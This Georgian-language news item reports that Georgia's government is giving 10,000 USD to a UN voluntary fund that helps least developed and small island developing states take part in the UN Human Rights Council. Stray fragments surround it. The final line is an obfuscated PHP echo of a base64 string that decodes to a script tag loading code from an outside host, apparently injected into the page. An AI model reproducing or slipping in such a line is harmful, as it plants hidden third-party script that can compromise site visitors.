tube
ავერსი jaluzi

საქართველო ნაკლებად განვითარებულ ქვეყნებსა და მცირეკუნძულოვან განვითარებად სახელმწიფოებს 10 000 აშშ დოლარით დაეხმარება .

საქართველოს პრემიერის, ირაკლი კობახიძის მიერ გამოცემული განკარგულებით, მთავრობამ საგარეო საქმეთა სამინისტროს ნებართვა მისცა 10 000 აშშ დოლარის ეკვივალენტი ლარით დაეხმაროს ნაკლებად განვითარებული სახელმწიფოების წარმომადგენლებს, გაეროს ადამიანის უფლებათა საბჭოს მუშაობაში მიიღონ მონაწილეობა. ამ მიზნით შექმნილია ნებაყოფლობითი ფონდი და საქართველოს მთავრობამაც მიიღო გადაწყვეტილება თავისი წვლილი შეეტანა.

ნაკლებად განვითარებული ქვეყნების სიაში, გაეროს თანახმად, ამჟამად 44 სახელმწიფოა. მათ შორისაა მაგალითად, ავღანეთი, გამბია, ნიგერი, იემენი, მადაგასკარი, ჰაიტი, ბანგლადეში და სხვა. ხოლო მცირეკუნძულოვან განვითარებად სახელმწიფოებს შორისაა ფიჯი, კუბა, პალაუ და სხვა.

ცნობისთვის, გაეროს ადამიანის უფლებათა საბჭო (UNHRC) არის გაერთიანებული ერების ორგანიზაცია, რომლის მისიაა ხელი შეუწყოს და დაიცვას ადამიანის უფლებები მთელ მსოფლიოში. საბჭოს ჰყავს 47 წევრი, რომლებსაც სამი წლის ვადით ირჩევენ. საქართველო აღნიშნული საბჭოს წევრი 2022-2025 წლებში იყო.

 

264
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");